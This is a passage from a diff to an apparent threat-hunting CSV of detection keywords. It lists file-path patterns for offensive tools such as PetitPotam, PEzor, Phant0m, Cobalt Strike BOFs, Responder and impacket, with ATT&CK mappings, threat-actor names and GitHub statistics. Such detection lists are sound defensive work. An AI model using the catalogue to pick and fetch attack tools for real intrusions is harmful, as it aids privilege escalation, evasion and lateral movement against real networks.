tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1590","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*/PetitPotam.git*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*/petitpotam.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/PEzor.cna*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/PEzor.git*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/PEzor.sh *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" "*/PEzor/inject.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*/pfsense_clickjacking*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/pfsense_clickjacking*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/pgsql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Phant0m.git*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" "*/phant0m-exe*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" @@ -4711,7 +4756,7 @@ "*/phishing/password_box*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/PhishingServer/*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" "*/pid:1337 */dll:*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","","","" -"*/ping6.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/ping6.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/PipeViewer.exe*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer.git*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*/PipeViewer.sln*","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","5","453","33","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" @@ -4721,55 +4766,55 @@ "*/pivotnaccilib*","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","614","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*/pjl-info-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","1","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" "*/pjl-ready-message.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/pkg/state/sudoers.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6213","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/pkg/state/sudoers.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" "*/PKINITtools*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" "*/Plazmaz/LNKUp*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*/PoC/PrivilegeEscalation*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" "*/POC_DLL.vcxproj*","offensive_tool_keyword","RunAsWinTcb","RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.","T1073.002 - T1055.001 - T1055.002","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/tastypepperoni/RunAsWinTcb","1","1","N/A","10","2","119","16","2022-08-02T16:35:50Z","2022-07-29T16:36:06Z" "*/PoC-CVE-2023-21554*","offensive_tool_keyword","poc","Windows Message Queuing vulnerability exploitation with custom payloads","T1192 - T1507","TA0002","N/A","N/A","Network Exploitation Tools","https://github.com/Hashi0x/PoC-CVE-2023-21554","1","1","N/A","N/A","","N/A","","","" -"*/poisoners/*.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4198","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" +"*/poisoners/*.py","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*/polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*/pop3-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pop3-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/pop3-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/popCalc.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","407","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" +"*/popCalc.bin*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/spawn","1","1","N/A","10","10","408","71","2023-03-08T15:53:44Z","2021-07-17T16:35:59Z" "*/PortBender/*","offensive_tool_keyword","cobaltstrike","PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/praetorian-inc/PortBender","1","1","N/A","10","10","591","104","2023-01-31T09:44:16Z","2021-05-27T02:46:29Z" -"*/portscan.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","480","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" -"*/portscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/portscan.cna*","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","481","49","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" +"*/portscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" "*/port-states.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/POSeidon.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" -"*/posh.key*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - 